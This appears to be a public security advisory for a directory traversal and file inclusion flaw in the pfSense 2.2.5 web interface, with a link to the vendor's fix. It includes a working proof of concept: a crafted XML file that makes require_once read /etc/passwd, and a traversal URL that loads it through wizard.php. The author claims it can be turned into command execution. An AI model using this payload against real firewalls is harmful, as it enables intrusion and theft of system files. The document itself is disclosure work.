# Title : PFSense<= 2.2.5 Directory Traversal# Date : 18/12/2015# Author : R-73eN# Tested on : PFSense 2.2.5# Software : https://github.com/pfsense/pfsense# Vendor : https://pfsense.org/#_________ __# |_ _|_ __/ _| ___/ ___| ___ _ __/ \| |#| || '_ \| |_ / _ \| |_ / _ \ '_ \/ _ \ | |#| || | | |_| (_) | |_| |__/ | | |/ ___ \| |___ # |___|_| |_|_|\___/ \____|\___|_| |_| /_/ \_\_____|### Fix provided by the vendor https://github.com/pfsense/pfsense/commit/3ac0284805ce357552c3ccaeff0a9aadd0c6ea13##
In pfsense <=2.2.5(Latest Version), during a security audit i discovered the following vulnerabilities in the pfsense Webgui.
The following files are vulnerable to a file inclusion attack
wizard.php?xml=
pkg.php?xml=
Both of this files do not sanitize the path of the xml parameter and we can load xml files,and loading a special crafted xml file we can gain command execution.
Example:1.xml (the filename can be whatever .txt ,.jpg etc because it does not check for the file extension)
The content of the 1.xml should be:<?xml version="1.0" encoding="utf-8" ?><pfsensewizard><totalsteps>12</totalsteps><step><id>1</id><title>LFI example </title><description>Lfi example </description><disableheader>on</disableheader><stepsubmitphpaction>step1_submitphpaction();</stepsubmitphpaction><includefile>/etc/passwd</includefile></step></pfsensewizard>
the parameter <includefile>is passed to a require_once() function which triggers the File inclusion Attack.
As we all know File inclusion attack can be converted toRCEvery easily.
Then visiting
http://vulnhost/wizard.php?xml=../../../1.xml
where the "xml" parameter is the path of the crafted file, will trigger the vulnerability.
Thanks
Rio Sherri
https://www.infogen.al/- Infogen AL
